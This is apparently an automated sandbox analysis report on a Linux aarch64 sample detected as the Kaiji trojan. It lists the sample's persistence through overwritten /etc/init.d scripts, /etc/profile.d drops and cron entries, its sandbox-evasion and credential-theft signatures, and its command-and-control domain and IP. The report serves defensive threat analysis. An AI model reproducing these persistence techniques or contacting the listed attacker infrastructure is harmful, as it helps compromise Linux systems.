    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisksJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-earlyJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/cupsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsedJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/dbusJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3Jump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtempJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalanceJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsidJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/kmodJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdmJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensorsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolldJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4Jump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-toolsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsiJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-toolsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouthJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-logJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/procpsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyncJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslogJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/sanedJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanupJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagentJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/udevJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/ufwJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgradesJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/uuiddJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-commonJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Shell script file created: /etc/profile.d/bash_cfg.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Shell script file created: /etc/init.d/console-setup.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Shell script file created: /etc/init.d/hwclock.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Shell script file created: /etc/init.d/keyboard-setup.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Shell script file created: /etc/profile.d/gateway.shJump to dropped file
    Source: /usr/sbin/service (PID: 6309)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 6398)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/acpidJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/alsa-utilsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/anacronJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/apparmorJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/apportJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/avahi-daemonJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/binfmt-supportJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/bluetoothJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/console-setup.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/cronJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/cryptdisksJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/cryptdisks-earlyJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/cupsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/cups-browsedJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/dbusJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/gdm3Jump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/hddtempJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/hwclock.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/irqbalanceJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/iscsidJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/keyboard-setup.shJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/kmodJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/lightdmJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/lm-sensorsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/lvm2-lvmpolldJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/mono-xsp4Jump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/multipath-toolsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/open-iscsiJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/open-vm-toolsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/plymouthJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/plymouth-logJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/procpsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/rsyncJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/rsyslogJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/sanedJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/screen-cleanupJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/spice-vdagentJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/sshJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/udevJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/ufwJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/unattended-upgradesJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/uuiddJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/init.d/x11-commonJump to dropped file
    Source: /etc/32676 (PID: 6304)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32676 (PID: 6460)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32676 (PID: 6522)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /usr/bin/sleep (PID: 6304)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 6460)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 6522)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/sbin/cron (PID: 6401)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/sbin/cron (PID: 6417)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/sbin/cron (PID: 6417)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6274)Queries kernel information via 'uname': Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6295)Queries kernel information via 'uname': Jump to behavior
    Source: /etc/32676 (PID: 6300)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6310)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6341)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6346)Queries kernel information via 'uname': Jump to behavior
    Source: /.mod (PID: 6409)Queries kernel information via 'uname': Jump to behavior
    Source: /.mod (PID: 6475)Queries kernel information via 'uname': Jump to behavior
    Source: open-vm-tools.14.drBinary or memory string: # Check if we're running inside VMWare
    Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1
    Source: linux_aarch64.elf, 6274.1.00005604bbe3a000.00005604bc301000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/aarch64
    Source: open-vm-tools.14.drBinary or memory string: if ! ${checktool} | grep -iq vmware; then
    Source: open-vm-tools.14.drBinary or memory string: rm -f /var/run/vmtoolsd.pid
    Source: linux_aarch64.elf, 6274.1.00007ffcddf4c000.00007ffcddf6d000.rw-.sdmpBinary or memory string: )x86_64/usr/bin/qemu-aarch64/tmp/linux_aarch64.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/linux_aarch64.elf
    Source: linux_aarch64.elf, 6274.1.00005604bbe3a000.00005604bc301000.rw-.sdmpBinary or memory string: Vrg.qemu.gdb.arm.sys.regs">
    Source: open-vm-tools.14.drBinary or memory string: checktool='vmware-checkvm'
    Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
    Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
    Source: open-vm-tools.14.drBinary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
    Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid || exit 2
    Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
    Source: linux_aarch64.elf, 6274.1.00005604bbe3a000.00005604bc301000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">
    Source: open-vm-tools.14.drBinary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 || exit $?
    Source: linux_aarch64.elf, 6274.1.00005604bbe3a000.00005604bc301000.rw-.sdmpBinary or memory string: V1/etc/qemu-binfmt/aarch64O
    Source: linux_aarch64.elf, 6274.1.00007ffcddf4c000.00007ffcddf6d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: linux_aarch64.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: linux_aarch64.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information2
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    1
    Unix Shell Configuration Modification
    1
    Unix Shell Configuration Modification
    1
    Masquerading
    1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    Data Manipulation
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Systemd Service
    1
    Systemd Service
    1
    Hide Artifacts
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt2
    Scripting
    Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File and Directory Permissions Modification
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Hidden Files and Directories
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562743 Sample: linux_aarch64.elf Startdate: 25/11/2024 Architecture: LINUX Score: 80 86 wdearas.liveya.org 103.135.101.188, 1930, 34026 TH-AS-APTianhaiInfoTechCN Hong Kong 2->86 88 109.202.202.202, 80 INIT7CH Switzerland 2->88 90 3 other IPs or domains 2->90 92 Suricata IDS alerts for network traffic 2->92 94 Multi AV Scanner detection for submitted file 2->94 96 Yara detected Kaiji 2->96 10 linux_aarch64.elf 2->10         started        12 systemd cron 2->12         started        14 systemd cron 2->14         started        16 5 other processes 2->16 signatures3 process4 process5 18 linux_aarch64.elf linux_aarch64.elf 10->18         started        22 cron 12->22         started        24 cron 14->24         started        file6 76 /etc/profile.d/gateway.sh, Bourne-Again 18->76 dropped 78 /etc/profile.d/bash_cfg.sh, Bourne-Again 18->78 dropped 80 /etc/init.d/x11-common, POSIX 18->80 dropped 82 44 other files (43 malicious) 18->82 dropped 98 Sample tries to set files in /etc globally writable 18->98 100 Sample tries to persist itself using /etc/profile 18->100 102 Drops files in suspicious directories 18->102 26 linux_aarch64.elf bash 18->26         started        30 linux_aarch64.elf service systemctl 18->30         started        32 linux_aarch64.elf service systemctl 18->32         started        38 6 other processes 18->38 34 cron sh 22->34         started        36 cron sh 24->36         started        signatures7 process8 file9 84 /etc/crontab, ASCII 26->84 dropped 104 Sample tries to persist itself using cron 26->104 40 service 30->40         started        42 service basename 30->42         started        52 2 other processes 30->52 44 service 32->44         started        54 3 other processes 32->54 46 sh .mod 34->46         started        48 sh .mod 36->48         started        50 bash 32676 38->50         started        56 7 other processes 38->56 signatures10 process11 process12 58 service systemctl 40->58         started        60 service sed 40->60         started        62 service systemctl 44->62         started        64 service sed 44->64         started        66 .mod 46->66         started        68 .mod 48->68         started        70 32676 sleep 50->70         started        72 32676 sleep 50->72         started        74 3 other processes 50->74
    SourceDetectionScannerLabelLink
    linux_aarch64.elf24%ReversingLabsLinux.Trojan.Kaiji
    SourceDetectionScannerLabelLink
    /.mod0%ReversingLabs
    /etc/326760%ReversingLabs
    /etc/init.d/acpid0%ReversingLabs
    /etc/init.d/alsa-utils0%ReversingLabs
    /etc/init.d/anacron0%ReversingLabs
    /etc/init.d/apparmor0%ReversingLabs
    /etc/init.d/avahi-daemon0%ReversingLabs
    /etc/init.d/binfmt-support0%ReversingLabs
    /etc/init.d/bluetooth0%ReversingLabs
    /etc/init.d/console-setup.sh0%ReversingLabs
    /etc/init.d/cron0%ReversingLabs
    /etc/init.d/cryptdisks0%ReversingLabs
    /etc/init.d/cryptdisks-early0%ReversingLabs
    /etc/init.d/cups0%ReversingLabs
    /etc/init.d/cups-browsed0%ReversingLabs
    /etc/init.d/dbus0%ReversingLabs
    /etc/init.d/gdm30%ReversingLabs
    /etc/init.d/hddtemp0%ReversingLabs
    /etc/init.d/hwclock.sh0%ReversingLabs
    /etc/init.d/irqbalance0%ReversingLabs
    /etc/init.d/iscsid0%ReversingLabs
    /etc/init.d/keyboard-setup.sh0%ReversingLabs
    /etc/init.d/kmod0%ReversingLabs
    /etc/init.d/lightdm0%ReversingLabs
    /etc/init.d/lm-sensors0%ReversingLabs
    /etc/init.d/lvm2-lvmpolld0%ReversingLabs
    /etc/init.d/mono-xsp40%ReversingLabs
    /etc/init.d/multipath-tools0%ReversingLabs
    /etc/init.d/open-iscsi0%ReversingLabs
    /etc/init.d/open-vm-tools0%ReversingLabs
    /etc/init.d/plymouth0%ReversingLabs
    /etc/init.d/plymouth-log0%ReversingLabs
    /etc/init.d/procps0%ReversingLabs
    /etc/init.d/rsync0%ReversingLabs
    /etc/init.d/rsyslog0%ReversingLabs
    /etc/init.d/saned0%ReversingLabs
    /etc/init.d/screen-cleanup0%ReversingLabs
    /etc/init.d/spice-vdagent0%ReversingLabs
    /etc/init.d/ssh0%ReversingLabs
    /etc/init.d/udev0%ReversingLabs
    /etc/init.d/ufw0%ReversingLabs
    /etc/init.d/unattended-upgrades0%ReversingLabs
    /etc/init.d/uuidd0%ReversingLabs
    /etc/init.d/x11-common0%ReversingLabs
    /etc/profile.d/bash_cfg.sh0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    wdearas.liveya.org
    103.135.101.188
    truetrue
      unknown
      www.google.com
      172.217.21.36
      truefalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        103.135.101.188
        wdearas.liveya.orgHong Kong
        4842TH-AS-APTianhaiInfoTechCNtrue
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        103.135.101.188xi.arm.elfGet hashmaliciousMirai, MoobotBrowse
          xi.arm7.elfGet hashmaliciousMirai, MoobotBrowse
            xi.m68k.elfGet hashmaliciousMirai, MoobotBrowse
              xi.x86.elfGet hashmaliciousMirai, MoobotBrowse
                xi.mips.elfGet hashmaliciousMirai, MoobotBrowse
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  91.189.91.43linux_amd64.elfGet hashmaliciousChaosBrowse
                    linux_arm6.elfGet hashmaliciousChaosBrowse
                      x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                        fbot.arm5.elfGet hashmaliciousMiraiBrowse
                          sshd.elfGet hashmaliciousUnknownBrowse
                            iwir64.elfGet hashmaliciousMiraiBrowse
                              vwkjebwi686.elfGet hashmaliciousUnknownBrowse
                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                  loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                    Mozi.m.elfGet hashmaliciousMiraiBrowse
                                      91.189.91.42linux_amd64.elfGet hashmaliciousChaosBrowse
                                        linux_mips.elfGet hashmaliciousChaosBrowse
                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                            x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              fbot.arm5.elfGet hashmaliciousMiraiBrowse
                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                  iwir64.elfGet hashmaliciousMiraiBrowse
                                                    vwkjebwi686.elfGet hashmaliciousUnknownBrowse
                                                      la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                        loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.google.comlinux_arm64.elfGet hashmaliciousChaosBrowse
                                                          • 172.217.17.68
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 142.250.181.100
                                                          linux_arm5.elfGet hashmaliciousChaosBrowse
                                                          • 142.250.80.68
                                                          https://zxptech.comGet hashmaliciousUnknownBrowse
                                                          • 142.250.181.100
                                                          linux_386.elfGet hashmaliciousChaosBrowse
                                                          • 142.250.181.100
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 142.250.181.100
                                                          linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                                          • 142.250.181.100
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 172.217.21.36
                                                          https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMmGet hashmaliciousUnknownBrowse
                                                          • 172.217.21.36
                                                          https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                                          • 172.217.21.36
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBlinux_mipsel.elfGet hashmaliciousChaosBrowse
                                                          • 185.125.190.26
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          linux_mips.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 91.189.91.42
                                                          fbot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          iwir64.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          vwkjebwi686.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          CANONICAL-ASGBlinux_mipsel.elfGet hashmaliciousChaosBrowse
                                                          • 185.125.190.26
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          linux_mips.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 91.189.91.42
                                                          fbot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          iwir64.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          vwkjebwi686.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          TH-AS-APTianhaiInfoTechCNlinux_arm64.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          linux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          linux_arm5.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          linux_386.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                                          • 103.135.101.78
                                                          DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 202.61.233.66
                                                          Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                          • 202.61.204.198
                                                          Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                          • 202.61.196.212
                                                          xi.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.135.101.188
                                                          INIT7CHlinux_amd64.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          linux_mips.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 109.202.202.202
                                                          fbot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          iwir64.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          vwkjebwi686.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          /.modlinux_386.elfGet hashmaliciousKaijiBrowse
                                                            linux_arm7.elfGet hashmaliciousKaijiBrowse
                                                              utZX7JAuMU.elfGet hashmaliciousKaijiBrowse
                                                                fL4E1jNVCt.elfGet hashmaliciousKaijiBrowse
                                                                  Xq5coKA8BI.elfGet hashmaliciousKaijiBrowse
                                                                    Ww0lpzmYHO.elfGet hashmaliciousKaijiBrowse
                                                                      c4RvDuLtq1.elfGet hashmaliciousKaijiBrowse
                                                                        linux_arm5.elfGet hashmaliciousKaijiBrowse
                                                                          linux_aarch64.elfGet hashmaliciousKaijiBrowse
                                                                            linux_amd64.elfGet hashmaliciousKaijiBrowse
                                                                              /etc/32676linux_386.elfGet hashmaliciousKaijiBrowse
                                                                                linux_arm7.elfGet hashmaliciousKaijiBrowse
                                                                                  utZX7JAuMU.elfGet hashmaliciousKaijiBrowse
                                                                                    fL4E1jNVCt.elfGet hashmaliciousKaijiBrowse
                                                                                      Xq5coKA8BI.elfGet hashmaliciousKaijiBrowse
                                                                                        Ww0lpzmYHO.elfGet hashmaliciousKaijiBrowse
                                                                                          c4RvDuLtq1.elfGet hashmaliciousKaijiBrowse
                                                                                            linux_arm5.elfGet hashmaliciousKaijiBrowse
                                                                                              linux_aarch64.elfGet hashmaliciousKaijiBrowse
                                                                                                linux_amd64.elfGet hashmaliciousKaijiBrowse
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:Bourne-Again shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):36
                                                                                                  Entropy (8bit):3.9931325576478587
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:TKH/LQP5o:8M2
                                                                                                  MD5:FF0DB01AA3465358D28FD34FE8479236
                                                                                                  SHA1:DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
                                                                                                  SHA-256:BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
                                                                                                  SHA-512:F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: linux_386.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                                                  • Filename: utZX7JAuMU.elf, Detection: malicious, Browse
